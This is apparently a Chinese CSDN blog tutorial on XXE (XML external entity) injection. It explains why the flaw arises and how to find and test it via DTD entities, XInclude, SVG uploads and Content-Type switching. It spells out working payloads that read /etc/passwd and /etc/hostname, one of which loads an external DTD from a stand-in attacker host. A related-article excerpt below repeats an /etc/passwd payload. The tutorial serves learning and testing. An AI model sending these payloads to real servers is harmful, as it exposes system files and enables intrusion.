XML 外部实体注入漏洞

最新推荐文章于 2024-06-03 07:00:00 发布
最新推荐文章于 2024-06-03 07:00:00 发布
阅读量4.6k 收藏 10
点赞数 1
分类专栏: Web安全进阶 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40201047/article/details/121321975
版权

0x01 XXE(XML外部实体注入)漏洞

1.1 漏洞原因

1.2 漏洞构造方式

1.3 XML可解析的协议

0x02 寻找XXE漏洞隐藏的攻击面

2.1 XInclude攻击

2.2 通过文件上传进行XXE攻击

2.3 通过修改Content-Type头进行XXE攻击

0x03 如何查找和测试XXE漏洞

0x01 XXEXML外部实体注入)漏洞

1.1 漏洞原因

    XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行、内网扫描等危害。

    libxml<2.9 默认开启

1.2 漏洞构造方式

1.2.1 直接通过DTD外部实体声明

<?xml version="1.0"?>

<!DOCTYPE a[

    <!ENTITY b SYSTEM "file:///etc/passwd">

]>

<a>&b;</a>

1.2.2 通过DTD外部实体声明引入外部DTD文档

#构造数据包
<?xml version="1.0"?>

<!DOCTYPE m [

       <!ENTITY b SYSTEM "http://mark4z5.com/evil.dtd">

]>

<a>&b;</a>

#而http://mark4z5.com/evil.dtd内容为

<!ENTITY b SYSTEM "file:///etc/passwd">
​
 

1.2.3 通过DTD外部实体声明引入DTD文档

# 构造数据包
<?xml version="1.0"?>

<!DOCTYPE a [

    <!ENTITY %b SYSTEM "http://mark4z5.com/evil.dtd">

]>

<a>%b;</a>

#http://mark4z5.com/evil.dtd文件内容

<!ENTITY b SYSTEM "file:///etc/passwd">
​
 

1.3 XML可解析的协议

libxml2

file、http、ftp

PHP

file、http、ftp、php、glob、data...

JAVA

file、http、ftp、https、jar、gopher...

.NET

file、http、ftp、https

0x02 寻找XXE漏洞隐藏的攻击面

    XXE漏洞的攻击面通常为HTTP传输流量下的XML数据请求,但是在其他方面可能也存在XXE漏洞。

2.1 XInclude攻击

    一些应用程序在用户提交数据后,服务器将数据嵌入到XML文档中,然后对XML进行解析。例如当客户端提交的数据被放入后端的SOAP请求,然后由SOAP服务处理时,就会发生这种情况。

    由于无法控制XML文档,对DTD文档进行修改触发而XXE漏洞,我们可以使用Xinclude进行攻击。XInclude 是一种使用元素、属性以及 URI 引用来合并 XML 文档的机制,它是XML规范的一部分,允许在子文档中构建XML文档。我们可以在XML文档中放入恶意数据来进行XInclude攻击,攻击条件为我们可以控制传输中的数据,将其替换为服务器短的XML文件。

    通过参考XInclude命名空间和提供我们想要包含的文件路径,可以完成XInclude的XXE攻击。

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

2.2 通过文件上传进行XXE攻击

    一些应用程序允许上传使用XML或者包含XML组件的格式文件,并且在服务端会对其进行处理、验证,常见的有DOCX、SVG等格式。

    尤其在图片上传中,服务端可能期望获取到PNG、JPG格式的图片,但是服务端使用的处理库可能同样是支持SVG格式的,所以我们可以通过上传SVG格式的图片来进行XXE攻击。

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
 

2.3 通过修改Content-Type头进行XXE攻击

    大多数情况下,POST请求包使用的是默认的application/x-www-form-urlencoded。有些网站希望接收这种格式的请求,但会容忍其他内容类型,包括XML。

# 普通的请求包:

POST /action HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 7


foo=bar

# 可以替换为:

POST /action HTTP/1.0

Content-Type: text/xml

Content-Length: 52


<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
 

      如果应用程序容忍消息正文中包含 XML 的请求,并将正文内容解析为 XML,那么您只需将请求重新格式化为使用 XML 格式即可到达隐藏的 XXE 攻击面。

0x03 如何查找和测试XXE漏洞

    通过定义一个指向系统文件的外部实体,尝试对系统文件目录进行遍历,查看返回包是否包含XXE注入信息。

    构建http://dnslog.cn/等基于可控的外部实体注入,然后对可控URL进行监控,判断是否存在XXE漏洞。

    对于用户端使用非XML文档交互的接口,使用XInclude攻击来尝试包含一个有用的系统文件。

参考资料:

XXE漏洞详解(XML外部实体注入)_谢公子的博客-CSDN博客

What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy

  

   

   

   

泽娃哦
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
WebSphere XML外部实体(XXE)注入漏洞(CVE-2020-4643)
10-25
WebSphere 9.0.0-9.0.5.5及8.5.0.0-8.5.5.18:更新安全补丁PH27509 WebSphere 8.0.0.0-8.0.0.15:升级到8.0.0.15版本,然后更新安全补丁PH27509 WebSphere 7.0.0.0-7.0.0.45:升级到7.0.0.45版本,然后更新安全补丁...
漏洞XML实体注入
shy的博客
06-30 2835
XXE——XML外部实体注入 程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 XML是可扩展标记语言,很类型HTML语言。 但是xml语言的标签没有预定义,需要自定义标签。 XML 被设计用来结构化、存储以及传输信息。但是 XML 不会做任何事情。 举个栗子:张三给李四写了一张便签,标题是提醒,内容是:李四,你不要忘记开会。 <note> <to>李四</to> <from>张三</from> <hea
Java代码审计安全篇-XXE(XML外部实体注入)漏洞
m0_63138919的博客
03-14 1798
本文章参考qax的网络安全java代码审计和部分师傅审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
XML 相关漏洞风险研究
最新发布
有价值炮灰
06-03 1791
使用了这么久 XML,但是对其内部细节却不甚了解,本文就来补全这个缺憾。
XML外部实体注入——XXE漏洞详解
Gefangenes的博客
07-02 2077
首先要了解什么是XXE漏洞,首先应该了解一下什么是XMLXML(可扩展标记语言,英文全称:eXtensible Markup Language)是一种用于描述数据结构和交换数据的标记语言。XML是一种非常灵活的语言,可以用于描述各种类型的数据,如文档、图像、音频、视频等。这个解释太官方,我们可以将xml语言和html对比着再来解释一下1>xml仅仅是纯文本,他不会做任何事情2>xml可以自己发明标签(允许定义自己的标签和文档结构)3>专门用来存放传输数据的东西。
xml外部实体泄露信息_在一般实体中包括外部信息
cuyi7076的博客
06-21 716
注意:本技巧假定您对文档类型定义(DTD)有基本的了解,并具有检查处理过的XML文件的XML解析器。 验证不是必需的; Internet Explorer 5.0或更高版本就足够了。 文件 在本技巧中,我从邮件合并系统中提取了一封示例信,并在其底部添加了标准免责声明。 最终,我希望从中央位置(例如服务器)控制免责声明,以便可以从文档本身进行外部控制。 基本文档包含该字母本身: ...
Web漏洞探索】外部实体注入漏洞
kjcxmx的博客
07-19 1055
外部实体注入漏洞XXE(XMLExternalEntityInjection)也就是XML外部实体注入XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。file//和ftp//等协议,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。不允许XML中含有自己定义的DTD。...
[Timeline Sec] - CVE-2020-29436:Nexus3 XML外部实体注入复现1
08-03
这篇文章提供了一个关于CVE-2020-29436的详细复现过程,对于理解和防范XML外部实体注入漏洞具有实际意义。及时更新软件、加强安全配置以及理解潜在攻击方式是防止此类攻击的关键。 参考链接: 1. ...
CVE-2018-11788:Apache Karaf XXE漏洞(CVE-2018-11788)
03-18
在最近对Apache Karaf的研究中,我发现其XML解析器中存在一些XXE(XML外部实体注入漏洞。 导致解析器不正确地解析XML文档。受影响的版本Apache Karaf <= 4.2.1 Apache Karaf <= 4.1.6分析根据,Apache ...
xxe-injection-payload-list::bullseye:XML外部实体(XXE)注入有效负载列表
02-06
XML外部实体(XXE,XML External Entity Injection)是一种网络安全漏洞,它允许攻击者通过恶意构造的XML输入来访问和泄露服务器内部资源。XXE注入通常发生在应用解析不受信任的XML输入时,没有正确地限制XML解析器...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
web安全漏洞挖掘梳理
06-22
其中,XXE 漏洞是一种常见的安全漏洞,攻击者可以通过构建外部实体注入来攻击 Web 应用程序。 1.什么是 XML XML(Extensible Markup Language)是一种标记语言,用于描述和定义数据的结构和内容。XML 文档通常由...
Having Fun with XML Hacking
04-13
在"KCON_sH"这个文件中,可能包含了关于如何发现和利用XML注入漏洞的实战教程、示例代码和安全建议。通过深入学习这个资源,你可以更好地理解XML注入的威胁,以及如何保护你的系统免受此类攻击。同时,也可以了解到...
6.XML漏洞和Excel文件1
08-04
这些漏洞被称为XML注入XML外部实体(XEE)攻击,它们允许攻击者通过恶意构造的XML文档来获取敏感信息、执行远程代码或者进行拒绝服务攻击。当一个程序不恰当地解析或处理XML时,就可能触发这些漏洞。 xlrd库在...
基于XXE漏洞的网络安全分析与利用工具开发
05-07
当应用是通过用户上传的XML文件或POST请求进行数唱的传输,并日应用没有禁止XNML引用外部实体,也没有过滤用户提交的XML数据,那么就会产生XML外部实体注入漏洞,即XXE漏洞。 XXE漏洞发生在应用程序解析XML输入时,...
漏洞修复--libxml2 安全漏洞 (CVE-2019-19956) libxml2 安全漏洞 (CVE-2019-20388) libxml2 安全漏洞 (CVE-2020-7595)
Q先生
11-15 760
漏洞修复--libxml2 安全漏洞 (CVE-2019-19956) libxml2 安全漏洞 (CVE-2019-20388) libxml2 安全漏洞 (CVE-2020-7595)
PHP XXE漏洞
weixin_30849591的博客
01-24 1088
PHP xml 外部实体注入漏洞(XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 727
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
XML外部实体注入漏洞原理
05-24
XML外部实体注入漏洞XML External Entity Injection, 简称XXE)是一种常见的安全漏洞,攻击者可以利用这种漏洞来读取任意文件、执行系统命令等操作。 在XML文档中,可以通过定义实体来引用外部资源,例如文件、URL等。当XML解析器解析XML文档时,如果不对外部实体进行限制,攻击者可以通过构造恶意的XML文档,将外部实体指向敏感文件或者恶意URL,从而导致漏洞。 具体来说,攻击者可以在XML文档中定义一个实体,使用DTD(Document Type Definition)语法将该实体指向一个外部文件,然后在XML文档中使用该实体。当XML解析器解析该实体时,就会将指定的外部文件读取进来,从而导致漏洞。 例如,下面的XML文档定义了一个名为“file”的实体,指向了一个敏感文件“/etc/passwd”: ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE message [ <!ELEMENT message (#PCDATA)> <!ENTITY file SYSTEM "file:///etc/passwd"> ]> <message>&file;</message> ``` 如果XML解析器不对外部实体进行限制,那么解析该文档时就会读取“/etc/passwd”文件的内容,并将其包含在<message>元素中返回给应用程序,从而导致敏感信息泄漏。 为了防止XXE漏洞,可以采取以下措施: 1. 禁止使用外部实体,或者限制外部实体的使用范围。可以在XML解析器中设置相关参数,例如禁止加载外部实体、禁止解析DTD等。 2. 对外部实体进行白名单过滤,只允许加载特定的URL或文件。 3. 检查输入数据,避免恶意输入注入XML文档中。 4. 对于持久化的XML数据,应该使用安全XML库来处理,例如使用DOM4J或JAXB等库,这些库会自动过滤掉外部实体
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值